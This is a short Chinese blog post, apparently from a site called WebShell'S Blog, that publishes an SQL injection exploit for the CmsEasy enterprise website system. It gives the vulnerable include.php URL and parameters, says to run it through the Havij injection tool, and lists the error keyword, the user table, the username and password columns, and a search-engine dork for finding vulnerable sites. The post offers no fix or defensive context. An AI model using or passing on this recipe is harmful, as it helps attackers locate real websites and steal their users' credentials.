易通企业网站系统最新注入漏洞。

注入EXP:

https://www.webshell.cc/celive/js/include.php?cmseasylive=1111&departmentid=0

直接放Havij里面跑。错误关键字:online.gif

添加表名:cmseasy_user

列表:userid,username,password

百度关键字:Powered by CmsEasy

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3691.html